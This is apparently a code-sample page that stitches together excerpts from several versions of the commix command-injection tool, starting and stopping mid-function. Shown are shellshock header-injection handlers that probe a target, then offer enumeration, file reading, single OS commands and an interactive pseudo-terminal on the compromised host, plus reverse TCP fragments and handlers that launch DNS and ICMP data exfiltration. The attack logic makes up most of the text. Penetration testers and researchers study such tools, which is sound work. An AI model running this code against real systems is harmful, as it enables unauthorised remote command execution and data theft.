                                                # Set up LHOST / LPORT for The reverse TCP connection.
                                                lhost, lport = reverse_tcp.configure_reverse_tcp(
                                                )
                                                while True:
                                                    # NOTE(review): parses as
                                                    # `lhost and (lport in
                                                    # SHELL_OPTIONS)`; confirm
                                                    # that is the intended test.
                                                    if lhost and lport in settings.SHELL_OPTIONS:
                                                        result = checks.check_reverse_tcp_options(
                                                            lhost)
                                                    else:
                                                        cmd = reverse_tcp.reverse_tcp_options(
                                                            lhost, lport)
                                                        result = checks.check_reverse_tcp_options(
                                                            cmd)
                                                    if result != None:
                                                        if result == 0:
                                                            return False
                                                        elif result == 1 or result == 2:
                                                            go_back_again = True
                                                            break
                                                    # Command execution results.
                                                    shell = cmd_exec(
                                                        url, cmd, cve,
                                                        check_header, filename)
                                                    if menu.options.verbose:
                                                        print ""
                                                    print Back.RED + "(x) Error: The reverse TCP connection to the target host has been failed!" + Style.RESET_ALL
                                            else:
                                                pass

                                        else:
                                            shell = cmd_exec(
                                                url, cmd, cve, check_header,
                                                filename)
                                            print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"

                                    except KeyboardInterrupt:
                                        raise

                                    except SystemExit:
                                        raise

                                    # NOTE(review): the bare except turns every
                                    # other error (EOFError on a closed stdin
                                    # included) into a silent exit with status
                                    # 0, which hides failures from callers.
                                    except:
                                        print ""
                                        sys.exit(0)

                            elif gotshell in settings.CHOISE_NO:
                                if checks.next_attack_vector(
                                        technique, go_back) == True:
                                    break
                                else:
                                    if no_result == True:
                                        return False
                                    else:
                                        return True

                            elif gotshell in settings.CHOISE_QUIT:
                                sys.exit(0)

                            else:
                                if gotshell == "":
                                    gotshell = "enter"
                                print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
                                continue
                            break
            # The header loop has no `break` of its own, so this else always
            # runs and simply moves on to the next CVE.
            else:
                continue

    except urllib2.HTTPError, err:
        # Report the HTTP error once, then ask whether to keep testing; a
        # positive answer silences later error messages.
        if settings.IGNORE_ERR_MSG == False:
            print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
            continue_tests = checks.continue_tests(err)
            if continue_tests == True:
                settings.IGNORE_ERR_MSG = True
            else:
                raise SystemExit()
コード例 #24
ファイル: shellshock.py プロジェクト: gprime31/commix
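def shellshock_handler(url, http_request_method, filename):
  """Run the shellshock check against `url` and drive the follow-up menus.

  Every (cve, header) pair from the module-level `shellshock_cves` and
  `headers` is probed with one request that carries an echo-marker payload in
  that single header.  A pair counts as a hit when the CVE identifier is found
  in `response.info()`.  After a hit the finding is handed to the `logs.*`
  helpers and the enumeration, file-access, `--os-cmd` and pseudo-terminal
  steps run through the sibling helpers (`enumeration`, `file_access`,
  `cmd_exec`, `check_options`).

  The function flips the process-wide `settings.DETECTION_PHASE` /
  `settings.EXPLOITATION_PHASE` flags and overwrites `menu.options.agent` on
  every probe, so other code reading those values sees the changes.

  Args:
    url: Target URL, used for every request and passed to the helpers.
    http_request_method: Only forwarded to `logs.add_parameter` and
      `check_options`; the probe itself is built as `Request(url, None, header)`.
    filename: Forwarded to the `logs.*` calls and the helpers (presumably the
      session log path -- confirm against the caller).

  Returns:
    When the operator declines the pseudo-terminal and
    `checks.next_attack_vector` does not return True: False while `no_result`
    is still True, True otherwise.  On every other non-raising path the
    function falls through and returns None.

  Raises:
    SystemExit: on a quit answer, after the `--os-cmd` output is printed, when
      no header produced a hit, and from the URLError / IncompleteRead
      handlers.
  """

  counter = 1
  vp_flag = True
  no_result = True
  export_injection_info = False

  injection_type = "results-based command injection"
  technique = "shellshock injection technique"

  info_msg = "Testing the " + technique + ". "
  if settings.VERBOSITY_LEVEL >= 2:
    info_msg = info_msg + "\n"
  sys.stdout.write(settings.print_info_msg(info_msg))
  sys.stdout.flush()

  try:
    i = 0
    total = len(shellshock_cves) * len(headers)
    for cve in shellshock_cves:
      for check_header in headers:
        # Check injection state
        settings.DETECTION_PHASE = True
        settings.EXPLOITATION_PHASE = False
        i = i + 1
        # The marker echoes the CVE identifier; detection below looks for that
        # identifier in the response header object.
        attack_vector = "echo " + cve + ":Done;"
        payload = shellshock_payloads(cve, attack_vector)

        # Check if defined "--verbose" option.
        if settings.VERBOSITY_LEVEL == 1:
          sys.stdout.write("\n" + settings.print_payload(payload))
        elif settings.VERBOSITY_LEVEL >= 2:
          debug_msg = "Generating payload for the injection."
          print(settings.print_debug_msg(debug_msg))
          print(settings.print_payload(payload))

        # Exactly one header carries the payload on each request.
        header = {check_header : payload}
        request = _urllib.request.Request(url, None, header)
        # menu.options.agent is shared state: it holds the payload only while
        # the User-Agent header is the one under test.
        if check_header == "User-Agent":
          menu.options.agent = payload
        else:
          menu.options.agent = default_user_agent
        log_http_headers.do_check(request)
        log_http_headers.check_http_traffic(request)
        # Check if defined any HTTP Proxy.
        if menu.options.proxy:
          response = proxy.use_proxy(request)
        # Check if defined Tor.
        elif menu.options.tor:
          response = tor.use_tor(request)
        else:
          response = _urllib.request.urlopen(request, timeout=settings.TIMEOUT)
        percent = ((i*100)/total)
        float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2))

        # This branch is evaluated first, so on the last (cve, header) pair the
        # displayed status depends only on whether an earlier pair already hit.
        if str(float_percent) == "100.0":
          if no_result == True:
            percent = settings.FAIL_STATUS
          else:
            percent = settings.info_msg
            no_result = False

        elif len(response.info()) > 0 and cve in response.info():
          percent = settings.info_msg
          no_result = False

        else:
          percent = str(float_percent)+ "%"

        if settings.VERBOSITY_LEVEL == 0:
          info_msg = "Testing the " + technique + "." + "" + percent + ""
          sys.stdout.write("\r" + settings.print_info_msg(info_msg))
          sys.stdout.flush()

        if no_result == False:
          # Check injection state
          settings.DETECTION_PHASE = False
          settings.EXPLOITATION_PHASE = True
          # Print the findings to log file.
          if export_injection_info == False:
            export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)

          vuln_parameter = "HTTP Header"
          the_type = " " + vuln_parameter
          # The header name is padded with a leading space only for the
          # logs.add_parameter call and restored right after it.
          check_header = " " + check_header
          vp_flag = logs.add_parameter(vp_flag, filename, the_type, check_header, http_request_method, vuln_parameter, payload)
          check_header = check_header[1:]
          logs.update_payload(filename, counter, payload)

          if settings.VERBOSITY_LEVEL != 0:
            if settings.VERBOSITY_LEVEL == 1:
              print(settings.SINGLE_WHITESPACE)
            checks.total_of_requests()

          info_msg = "The (" + check_header + ") '"
          info_msg += url + Style.RESET_ALL + Style.BRIGHT
          info_msg += "' seems vulnerable via " + technique + "."
          if settings.VERBOSITY_LEVEL == 0:
            print(settings.SINGLE_WHITESPACE)
          print(settings.print_bold_info_msg(info_msg))
          sub_content = "\"" + payload + "\""
          print(settings.print_sub_content(sub_content))

          # Enumeration options.
          if settings.ENUMERATION_DONE == True :
            if settings.VERBOSITY_LEVEL != 0:
              print(settings.SINGLE_WHITESPACE)
            while True:
              # In batch mode the prompt is skipped and the empty answer below
              # is turned into the default "Y".
              if not menu.options.batch:
                question_msg = "Do you want to enumerate again? [Y/n] > "
                enumerate_again = _input(settings.print_question_msg(question_msg))

              else:
                enumerate_again = ""
              if len(enumerate_again) == 0:
                enumerate_again = "Y"
              if enumerate_again in settings.CHOICE_YES:
                enumeration(url, cve, check_header, filename)
                break
              elif enumerate_again in settings.CHOICE_NO:
                break
              elif enumerate_again in settings.CHOICE_QUIT:
                raise SystemExit()
              else:
                # Invalid answer: report it and ask again.
                err_msg = "'" + enumerate_again + "' is not a valid answer."
                print(settings.print_error_msg(err_msg))
                pass
          else:
            enumeration(url, cve, check_header, filename)

          # File access options.
          if settings.FILE_ACCESS_DONE == True :
            while True:
              if not menu.options.batch:
                question_msg = "Do you want to access files again? [Y/n] > "
                file_access_again = _input(settings.print_question_msg(question_msg))
              else:
                file_access_again = ""
              if len(file_access_again) == 0:
                file_access_again = "Y"
              if file_access_again in settings.CHOICE_YES:
                file_access(url, cve, check_header, filename)
                break
              elif file_access_again in settings.CHOICE_NO:
                break
              elif file_access_again in settings.CHOICE_QUIT:
                raise SystemExit()
              else:
                # Invalid answer: report it and ask again.
                err_msg = "'" + file_access_again  + "' is not a valid answer."
                print(settings.print_error_msg(err_msg))
                pass
          else:
            file_access(url, cve, check_header, filename)

          if menu.options.os_cmd:
            cmd = menu.options.os_cmd
            shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
            # Build the whole string before printing: `print(...) + str` raises
            # TypeError under Python 3 because print() returns None.
            print("\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL)
            raise SystemExit()

          else:
            # Pseudo-Terminal shell
            print(settings.SINGLE_WHITESPACE)
            go_back = False
            go_back_again = False
            while True:
              if go_back == True:
                break
              if not menu.options.batch:
                question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > "
                gotshell = _input(settings.print_question_msg(question_msg))
              else:
                gotshell = ""
              if len(gotshell) == 0:
                gotshell = "Y"
              if gotshell in settings.CHOICE_YES:
                print("Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)")
                if settings.READLINE_ERROR:
                  checks.no_readline_module()
                while True:
                  try:
                    if not settings.READLINE_ERROR:
                      checks.tab_autocompleter()
                    sys.stdout.write(settings.OS_SHELL)
                    cmd = _input()
                    cmd = checks.escaped_cmd(cmd)

                    if cmd.lower() in settings.SHELL_OPTIONS:
                      os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result)
                      go_back, go_back_again = check_options(url, cmd, cve, check_header, filename, os_shell_option, http_request_method, go_back, go_back_again)

                      if go_back:
                        break
                    else:
                      shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
                      if shell != "":
                        # Update logs with executed cmds and execution results.
                        # The command and its output are handed to the logs
                        # module together with `filename`, so that log should
                        # be treated as sensitive engagement data.
                        logs.executed_command(filename, cmd, shell)
                        print("\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n")
                      else:
                        debug_msg = "Executing the '" + cmd + "' command. "
                        if settings.VERBOSITY_LEVEL == 1:
                          sys.stdout.write(settings.print_debug_msg(debug_msg))
                          sys.stdout.flush()
                          sys.stdout.write("\n" + settings.print_payload(payload)+ "\n")
                        elif settings.VERBOSITY_LEVEL >= 2:
                          sys.stdout.write(settings.print_debug_msg(debug_msg))
                          sys.stdout.flush()
                          sys.stdout.write("\n" + settings.print_payload(payload)+ "\n")
                        err_msg = "The '" + cmd + "' command, does not return any output."
                        print(settings.print_critical_msg(err_msg) + "\n")

                  except KeyboardInterrupt:
                    raise

                  except SystemExit:
                    raise

                  except EOFError:
                    err_msg = "Exiting, due to EOFError."
                    print(settings.print_error_msg(err_msg))
                    raise

                  # A TypeError inside the prompt loop silently leaves the
                  # pseudo-terminal; the error itself is not reported.
                  except TypeError:
                    break

              elif gotshell in settings.CHOICE_NO:
                if checks.next_attack_vector(technique, go_back) == True:
                  break
                else:
                  if no_result == True:
                    return False
                  else:
                    return True

              elif gotshell in settings.CHOICE_QUIT:
                raise SystemExit()

              else:
                err_msg = "'" + gotshell + "' is not a valid answer."
                print(settings.print_error_msg(err_msg))
                continue
              break
        else:
          continue

    if no_result:
      if settings.VERBOSITY_LEVEL != 2:
        print(settings.SINGLE_WHITESPACE)
      err_msg = "All tested HTTP headers appear to be not injectable."
      print(settings.print_critical_msg(err_msg))
      raise SystemExit()

  except _urllib.error.HTTPError as err_msg:
    # The try block wraps both loops, so any HTTP error ends the whole scan,
    # not just the current (cve, header) pair.
    if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR or str(err_msg.code) == settings.BAD_REQUEST:
      # `response` is not read again after this assignment within the function.
      response = False
    elif settings.IGNORE_ERR_MSG == False:
      err = str(err_msg) + "."
      print("\n" + settings.print_critical_msg(err))
      continue_tests = checks.continue_tests(err_msg)
      if continue_tests == True:
        settings.IGNORE_ERR_MSG = True
      else:
        raise SystemExit()

  except _urllib.error.URLError as err_msg:
    # Drops the first two space-separated words of the reason text before
    # printing it.
    err_msg = str(err_msg.reason).split(" ")[2:]
    err_msg = ' '.join(err_msg)+ "."
    if settings.VERBOSITY_LEVEL != 0 and settings.LOAD_SESSION == False:
      print(settings.SINGLE_WHITESPACE)
    print(settings.print_critical_msg(err_msg))
    raise SystemExit()

  except _http_client.IncompleteRead as err_msg:
    # err_msg is an exception object; convert it before concatenating so the
    # handler reports the error instead of failing with TypeError.
    print(settings.print_critical_msg(str(err_msg) + "."))
    raise SystemExit()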
コード例 #25
ファイル: fb_injector.py プロジェクト: jamesshew/commix
      response = False 
    except urllib2.URLError, err:
      if "Connection refused" in err.reason:
        err_msg =  "The target host is not responding."
        err_msg += " Please ensure that is up and try again."
        print "\n" + settings.print_critical_msg(err_msg)
      raise SystemExit()
      
  # Check if defined Tor.
  elif menu.options.tor:
    try:
      response = tor.use_tor(request)
    except urllib2.HTTPError, err:
      if settings.IGNORE_ERR_MSG == False:
        print settings.print_error_msg(err)
        continue_tests = checks.continue_tests(err)
        if continue_tests == True:
          settings.IGNORE_ERR_MSG = True
        else:
          raise SystemExit()
      response = False 
    except urllib2.URLError, err:
      if "Connection refused" in err.reason:
        err_msg =  "The target host is not responding."
        err_msg += " Please ensure that is up and try again."
        print "\n" + settings.print_critical_msg(err_msg)
      raise SystemExit()

  else:
    try:
      response = urllib2.urlopen(request)
コード例 #26
def shellshock_handler(url, http_request_method, filename):
    """Run the shellshock check against `url` and drive the follow-up menus.

    Python 2 variant.  Every (cve, header) pair from the module-level
    `shellshock_cves` and `headers` is probed with one request carrying an
    echo-marker payload in that single header.  A pair counts as a hit when
    the CVE identifier is found in `response.info()` or in the response body.
    After a hit the finding is passed to the `logs.*` helpers and the
    enumeration, file-access, `--os-cmd` and pseudo-terminal steps run through
    the sibling helpers.

    The process-wide `settings.DETECTION_PHASE` / `settings.EXPLOITATION_PHASE`
    flags are changed as a side effect.

    Args:
        url: Target URL, used for every request and passed to the helpers.
        http_request_method: Only forwarded to `logs.add_parameter` and
            `check_options`.
        filename: Forwarded to the `logs.*` calls and the helpers (presumably
            the session log path -- confirm against the caller).

    Returns:
        When the operator declines the pseudo-terminal and
        `checks.next_attack_vector` does not return True: False while
        `no_result` is still True, True otherwise.  Other non-raising paths
        fall through and return None.

    Raises:
        SystemExit: via `sys.exit(0)` on a quit answer, after the `--os-cmd`
            output, from the bare `except` in the prompt loop, and from the
            HTTPError handler when the operator chooses not to continue.
    """

    counter = 1
    vp_flag = True
    no_result = True
    export_injection_info = False

    injection_type = "results-based command injection"
    technique = "shellshock injection technique"

    info_msg = "Testing the " + technique + "... "
    sys.stdout.write(settings.print_info_msg(info_msg))
    sys.stdout.flush()

    try:
        i = 0
        total = len(shellshock_cves) * len(headers)
        for cve in shellshock_cves:
            for check_header in headers:
                # Check injection state
                settings.DETECTION_PHASE = True
                settings.EXPLOITATION_PHASE = False
                i = i + 1
                # The marker echoes the CVE identifier; detection below looks
                # for that identifier in the response.
                attack_vector = "echo " + cve + ":Done;"
                payload = shellshock_payloads(cve, attack_vector)

                # Check if defined "--verbose" option.
                if settings.VERBOSITY_LEVEL == 1:
                    sys.stdout.write("\n" + settings.print_payload(payload))
                elif settings.VERBOSITY_LEVEL > 1:
                    info_msg = "Generating a payload for injection..."
                    print "\n" + settings.print_info_msg(info_msg)
                    print settings.print_payload(payload)

                # Exactly one header carries the payload on each request.
                header = {check_header: payload}
                request = urllib2.Request(url, None, header)
                log_http_headers.check_http_traffic(request)
                # Direct urlopen: no timeout argument is passed and this
                # version has no proxy/Tor branch inside the handler.
                response = urllib2.urlopen(request)

                percent = ((i * 100) / total)
                float_percent = "{0:.1f}".format(
                    round(((i * 100) / (total * 1.0)), 2))

                # This branch is evaluated first, so on the last (cve, header)
                # pair the status depends only on whether an earlier pair hit.
                if str(float_percent) == "100.0":
                    if no_result == True:
                        percent = Fore.RED + "FAILED" + Style.RESET_ALL
                    else:
                        percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
                        no_result = False

                elif len(response.info()) > 0 and cve in response.info():
                    percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
                    no_result = False

                # NOTE(review): response.read() is called twice on the same
                # response object; the first call consumes the body, so the
                # second presumably returns an empty string -- confirm whether
                # this branch can ever match.
                elif len(response.read()) > 0 and cve in response.read():
                    percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
                    no_result = False

                else:
                    percent = str(float_percent) + "%"

                if not settings.VERBOSITY_LEVEL >= 1:
                    info_msg = "Testing the " + technique + "... " + "[ " + percent + " ]"
                    sys.stdout.write("\r" + settings.print_info_msg(info_msg))
                    sys.stdout.flush()

                if no_result == False:
                    # Check injection state
                    settings.DETECTION_PHASE = False
                    settings.EXPLOITATION_PHASE = True
                    # Print the findings to log file.
                    if export_injection_info == False:
                        export_injection_info = logs.add_type_and_technique(
                            export_injection_info, filename, injection_type,
                            technique)

                    #if vp_flag == True:
                    vuln_parameter = "HTTP Header"
                    the_type = " " + vuln_parameter
                    # The header name is padded with a leading space only for
                    # the logs.add_parameter call and restored right after it.
                    check_header = " " + check_header
                    vp_flag = logs.add_parameter(vp_flag, filename, the_type,
                                                 check_header,
                                                 http_request_method,
                                                 vuln_parameter, payload)
                    check_header = check_header[1:]
                    logs.update_payload(filename, counter, payload)

                    success_msg = "The (" + check_header + ") '"
                    success_msg += url + Style.RESET_ALL + Style.BRIGHT
                    success_msg += "' seems vulnerable via " + technique + "."
                    print "\n" + settings.print_success_msg(success_msg)
                    print settings.SUB_CONTENT_SIGN + "Payload: " + "\"" + payload + "\"" + Style.RESET_ALL
                    if not settings.VERBOSITY_LEVEL >= 1:
                        print ""
                    # Enumeration options.
                    if settings.ENUMERATION_DONE == True:
                        if settings.VERBOSITY_LEVEL >= 1:
                            print ""
                        while True:
                            # In batch mode the prompt is skipped and the empty
                            # answer below becomes the default "y".
                            if not menu.options.batch:
                                question_msg = "Do you want to enumerate again? [Y/n] > "
                                sys.stdout.write(
                                    settings.print_question_msg(question_msg))
                                enumerate_again = sys.stdin.readline().replace(
                                    "\n", "").lower()
                            else:
                                enumerate_again = ""
                            if len(enumerate_again) == 0:
                                enumerate_again = "y"
                            if enumerate_again in settings.CHOICE_YES:
                                enumeration(url, cve, check_header, filename)
                                break
                            elif enumerate_again in settings.CHOICE_NO:
                                break
                            elif enumerate_again in settings.CHOICE_QUIT:
                                sys.exit(0)
                            else:
                                # Invalid answer: report it and ask again.
                                err_msg = "'" + enumerate_again + "' is not a valid answer."
                                print settings.print_error_msg(err_msg)
                                pass
                    else:
                        enumeration(url, cve, check_header, filename)

                    # File access options.
                    if settings.FILE_ACCESS_DONE == True:
                        while True:
                            if not menu.options.batch:
                                question_msg = "Do you want to access files again? [Y/n] > "
                                sys.stdout.write(
                                    settings.print_question_msg(question_msg))
                                file_access_again = sys.stdin.readline(
                                ).replace("\n", "").lower()
                            else:
                                file_access_again = ""
                            if len(file_access_again) == 0:
                                file_access_again = "y"
                            if file_access_again in settings.CHOICE_YES:
                                file_access(url, cve, check_header, filename)
                                break
                            elif file_access_again in settings.CHOICE_NO:
                                break
                            elif file_access_again in settings.CHOICE_QUIT:
                                sys.exit(0)
                            else:
                                # Invalid answer: report it and ask again.
                                err_msg = "'" + file_access_again + "' is not a valid answer."
                                print settings.print_error_msg(err_msg)
                                pass
                    else:
                        file_access(url, cve, check_header, filename)

                    if menu.options.os_cmd:
                        cmd = menu.options.os_cmd
                        shell, payload = cmd_exec(url, cmd, cve, check_header,
                                                  filename)
                        print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL
                        sys.exit(0)

                    else:
                        # Pseudo-Terminal shell
                        go_back = False
                        go_back_again = False
                        while True:
                            if go_back == True:
                                break
                            if settings.ENUMERATION_DONE == False and settings.FILE_ACCESS_DONE == False:
                                if settings.VERBOSITY_LEVEL >= 1:
                                    print ""
                            if not menu.options.batch:
                                question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > "
                                sys.stdout.write(
                                    settings.print_question_msg(question_msg))
                                gotshell = sys.stdin.readline().replace(
                                    "\n", "").lower()
                            else:
                                gotshell = ""
                            if len(gotshell) == 0:
                                gotshell = "y"
                            if gotshell in settings.CHOICE_YES:
                                print ""
                                print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
                                # readline_error is not defined in this
                                # function; presumably a module-level flag set
                                # when the readline import fails -- confirm.
                                if readline_error:
                                    checks.no_readline_module()
                                while True:
                                    try:
                                        if not readline_error:
                                            # Tab completer
                                            readline.set_completer(
                                                menu.tab_completer)
                                            # macOS tab completer (libedit-backed readline)
                                            if getattr(
                                                    readline, '__doc__', ''
                                            ) is not None and 'libedit' in getattr(
                                                    readline, '__doc__', ''):
                                                readline.parse_and_bind(
                                                    "bind ^I rl_complete")
                                            # Unix tab completer
                                            else:
                                                readline.parse_and_bind(
                                                    "tab: complete")
                                        cmd = raw_input("""commix(""" +
                                                        Style.BRIGHT +
                                                        Fore.RED +
                                                        """os_shell""" +
                                                        Style.RESET_ALL +
                                                        """) > """)
                                        cmd = checks.escaped_cmd(cmd)

                                        if cmd.lower(
                                        ) in settings.SHELL_OPTIONS:
                                            os_shell_option = checks.check_os_shell_options(
                                                cmd.lower(), technique,
                                                go_back, no_result)
                                            go_back, go_back_again = check_options(
                                                url, cmd, cve, check_header,
                                                filename, os_shell_option,
                                                http_request_method, go_back,
                                                go_back_again)

                                            if go_back:
                                                break
                                        else:
                                            shell, payload = cmd_exec(
                                                url, cmd, cve, check_header,
                                                filename)
                                            if shell != "":
                                                # Update logs with executed cmds and execution results.
                                                # The command and its output go to the logs module
                                                # together with `filename`; treat that log as
                                                # sensitive engagement data.
                                                logs.executed_command(
                                                    filename, cmd, shell)
                                                print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
                                            else:
                                                info_msg = "Executing the '" + cmd + "' command... "
                                                if settings.VERBOSITY_LEVEL == 1:
                                                    sys.stdout.write(
                                                        "\n" + settings.
                                                        print_info_msg(
                                                            info_msg))
                                                elif settings.VERBOSITY_LEVEL > 1:
                                                    sys.stdout.write(
                                                        settings.
                                                        print_info_msg(
                                                            info_msg))
                                                sys.stdout.flush()
                                                sys.stdout.write(
                                                    "\n" +
                                                    settings.print_payload(
                                                        payload) + "\n")

                                                #print "\n" + settings.print_payload(payload)
                                                err_msg = "The '" + cmd + "' command, does not return any output."
                                                print settings.print_critical_msg(
                                                    err_msg) + "\n"

                                    except KeyboardInterrupt:
                                        raise

                                    except SystemExit:
                                        raise

                                    # NOTE(review): bare except -- any other
                                    # error prints a blank line and exits with
                                    # status 0, so the cause is never shown and
                                    # the exit code reports success.
                                    except:
                                        print ""
                                        sys.exit(0)

                            elif gotshell in settings.CHOICE_NO:
                                if checks.next_attack_vector(
                                        technique, go_back) == True:
                                    break
                                else:
                                    if no_result == True:
                                        return False
                                    else:
                                        return True

                            elif gotshell in settings.CHOICE_QUIT:
                                sys.exit(0)

                            else:
                                err_msg = "'" + gotshell + "' is not a valid answer."
                                print settings.print_error_msg(err_msg)
                                continue
                            break
                else:
                    continue

        if no_result:
            print ""

    # The try block wraps both loops, so an HTTP error ends the whole scan,
    # not just the current (cve, header) pair.
    except urllib2.HTTPError, err_msg:
        if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
            # `response` is not read again after this assignment.
            response = False
        elif settings.IGNORE_ERR_MSG == False:
            err = str(err_msg) + "."
            print "\n" + settings.print_critical_msg(err)
            continue_tests = checks.continue_tests(err_msg)
            if continue_tests == True:
                settings.IGNORE_ERR_MSG = True
            else:
                raise SystemExit()
コード例 #27
        if continue_tests == True:
          settings.IGNORE_ERR_MSG = True
        else:
          os._exit(0)

  # Check if defined Tor.
  elif menu.options.tor:
    try:
      response = tor.use_tor(request)
    except urllib2.HTTPError, err_msg:
      if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
        response = False  
      elif settings.IGNORE_ERR_MSG == False:
        err = str(err_msg) + "."
        print "\n" + settings.print_critical_msg(err)
        continue_tests = checks.continue_tests(err_msg)
        if continue_tests == True:
          settings.IGNORE_ERR_MSG = True
        else:
          os._exit(0)

  else:
    try:
      response = urllib2.urlopen(request)
    except urllib2.HTTPError, err_msg:
      if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
        response = False  
      elif settings.IGNORE_ERR_MSG == False:
        err = str(err_msg) + "."
        print "\n" + settings.print_critical_msg(err)
        continue_tests = checks.continue_tests(err_msg)
コード例 #28
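def dns_exfiltration_handler(url, http_request_method):
    """Prepare the request for `url` and hand off to the DNS exfiltration module.

    Steps, in order:
      1. Mark the detection phase in the process-wide `settings` flags.
      2. Stop unless the effective uid is 0 (`os.geteuid()` is Unix-only).
      3. Build the request: for "GET" from the URL alone, otherwise from
         `menu.options.data` after URL-unquoting and `do_POST_check`.
      4. Send it once through the proxy, Tor, or a direct `urlopen`.  The
         response object is not used afterwards in this function.
      5. Stop if `settings.TARGET_OS` is "win"; otherwise call
         `exploitation(...)` with `menu.options.dns_server`.

    All early exits use `os._exit(0)`, which terminates the process
    immediately without running cleanup handlers and reports status 0 even
    though an error message was printed.

    Args:
        url: Target URL.
        http_request_method: Compared with "GET" to pick the request shape and
            forwarded to `exploitation`.

    Returns:
        None.
    """
    # Check injection state
    settings.DETECTION_PHASE = True
    settings.EXPLOITATION_PHASE = False
    # You need to have root privileges to run this script
    if os.geteuid() != 0:
        err_msg = "You need to have root privileges to run this option."
        print("\n" + settings.print_critical_msg(err_msg))
        os._exit(0)

    if http_request_method == "GET":
        vuln_parameter = parameters.vuln_GET_param(url)
        request = _urllib.request.Request(url)
        headers.do_check(request)

    else:
        parameter = menu.options.data
        parameter = _urllib.parse.unquote(parameter)
        parameter = parameters.do_POST_check(parameter)
        request = _urllib.request.Request(url, parameter)
        headers.do_check(request)
        vuln_parameter = parameters.vuln_POST_param(parameter, url)

    # The three branches below share one error policy: a status equal to
    # settings.INTERNAL_SERVER_ERROR is tolerated, any other HTTP error is
    # shown once and the operator decides whether to continue.
    # Each message is concatenated inside print(): `print("\n") + text`
    # raises TypeError under Python 3 because print() returns None.

    # Check if defined any HTTP Proxy.
    if menu.options.proxy:
        try:
            response = proxy.use_proxy(request)
        except _urllib.error.HTTPError as err_msg:
            if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
                response = False
            elif settings.IGNORE_ERR_MSG == False:
                err = str(err_msg) + "."
                print("\n" + settings.print_critical_msg(err))
                continue_tests = checks.continue_tests(err_msg)
                if continue_tests == True:
                    settings.IGNORE_ERR_MSG = True
                else:
                    os._exit(0)

    # Check if defined Tor.
    elif menu.options.tor:
        try:
            response = tor.use_tor(request)
        except _urllib.error.HTTPError as err_msg:
            if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
                response = False
            elif settings.IGNORE_ERR_MSG == False:
                err = str(err_msg) + "."
                print("\n" + settings.print_critical_msg(err))
                continue_tests = checks.continue_tests(err_msg)
                if continue_tests == True:
                    settings.IGNORE_ERR_MSG = True
                else:
                    os._exit(0)

    else:
        try:
            # No timeout argument is passed to this direct urlopen call.
            response = _urllib.request.urlopen(request)
        except _urllib.error.HTTPError as err_msg:
            if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
                response = False
            elif settings.IGNORE_ERR_MSG == False:
                err = str(err_msg) + "."
                print("\n" + settings.print_critical_msg(err))
                continue_tests = checks.continue_tests(err_msg)
                if continue_tests == True:
                    settings.IGNORE_ERR_MSG = True
                else:
                    os._exit(0)

    if settings.TARGET_OS == "win":
        err_msg = "This module's payloads are not suppoted by "
        err_msg += "the identified target operating system."
        print(settings.print_critical_msg(err_msg) + "\n")
        os._exit(0)

    else:
        dns_server = menu.options.dns_server
        technique = "DNS exfiltration module"
        info_msg = "Loading the " + technique + ". \n"
        sys.stdout.write(settings.print_info_msg(info_msg))
        exploitation(dns_server, url, http_request_method, vuln_parameter,
                     technique)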
コード例 #29
def icmp_exfiltration_handler(url, http_request_method):
    """Prepare and launch the ICMP exfiltration module for ``url``.

    Marks the run as being in the detection phase, stops unless the process
    has administrative privileges, builds the HTTP request (POST when
    ``http_request_method`` equals ``settings.HTTPMETHOD.POST``, otherwise a
    plain URL request), sends it once through the configured proxy, Tor, or
    directly, and finally calls ``exploitation`` with the addresses parsed
    from ``menu.options.ip_icmp_data``.

    The process ends through ``os._exit(0)`` (no cleanup handlers run) when
    privileges are missing, when ``checks.continue_tests`` does not return
    ``True`` after an HTTP error, or when ``settings.TARGET_OS`` is "win".
    """
    # Check injection state
    settings.DETECTION_PHASE = True
    settings.EXPLOITATION_PHASE = False

    # This module only runs with administrative privileges.
    if not common.running_as_admin():
        privilege_err = "You need to have administrative privileges to run this module."
        print(settings.print_critical_msg(privilege_err) + "\n")
        os._exit(0)

    # Build the request and resolve the parameter name for the chosen method.
    if http_request_method == settings.HTTPMETHOD.POST:
        post_data = _urllib.parse.unquote(menu.options.data)
        post_data = parameters.do_POST_check(post_data, http_request_method)
        request = _urllib.request.Request(url, post_data)
        headers.do_check(request)
        vuln_parameter = parameters.vuln_POST_param(post_data, url)
    else:
        request = _urllib.request.Request(url)
        headers.do_check(request)
        vuln_parameter = parameters.vuln_GET_param(url)

    # One request through whichever transport is configured: HTTP proxy
    # first, then Tor, otherwise a direct connection with a timeout.
    try:
        if menu.options.proxy:
            response = proxy.use_proxy(request)
        elif menu.options.tor:
            response = tor.use_tor(request)
        else:
            response = _urllib.request.urlopen(request,
                                               timeout=settings.TIMEOUT)
    except _urllib.error.HTTPError as http_err:
        status = str(http_err.code)
        if status == settings.INTERNAL_SERVER_ERROR or status == settings.BAD_REQUEST:
            # These two status codes are tolerated without a prompt.
            response = False
        elif settings.IGNORE_ERR_MSG == False:
